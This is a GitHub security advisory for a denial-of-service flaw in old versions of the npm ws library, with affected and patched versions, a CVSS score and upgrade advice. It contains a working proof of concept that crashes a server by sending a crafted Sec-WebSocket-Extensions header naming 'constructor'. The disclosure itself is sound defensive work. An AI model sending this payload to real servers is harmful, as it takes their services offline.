Skip to content

Denial of Service in ws

High severity GitHub Reviewed Published Jun 4, 2019 to the GitHub Advisory Database • Updated Mar 23, 2023

Package

npm ws (npm)

Affected versions

>= 0.2.6, < 1.1.5
>= 2.0.0, < 3.3.1

Patched versions

1.1.5
3.3.1

Description

Affected versions of ws can crash when a specially crafted Sec-WebSocket-Extensions header containing Object.prototype property names as extension or parameter names is sent.

Proof of concept

const WebSocket = require('ws');
const net = require('net');

const wss = new WebSocket.Server({ port: 3000 }, function () {
  const payload = 'constructor';  // or ',;constructor'

  const request = [
    'GET / HTTP/1.1',
    'Connection: Upgrade',
    'Sec-WebSocket-Key: test',
    'Sec-WebSocket-Version: 8',
    `Sec-WebSocket-Extensions: ${payload}`,
    'Upgrade: websocket',
    '\r\n'
  ].join('\r\n');

  const socket = net.connect(3000, function () {
    socket.resume();
    socket.write(request);
  });
});

Recommendation

Update to version 3.3.1 or later.

References

Reviewed Jun 4, 2019
Published to the GitHub Advisory Database Jun 4, 2019
Last updated Mar 23, 2023

Severity

High
7.5
/ 10

CVSS base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
None
Availability
High
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Weaknesses

CVE ID

No known CVE

GHSA ID

GHSA-5v72-xg48-5rpm

Source code

No known source code
Checking history
See something to contribute? Suggest improvements for this vulnerability.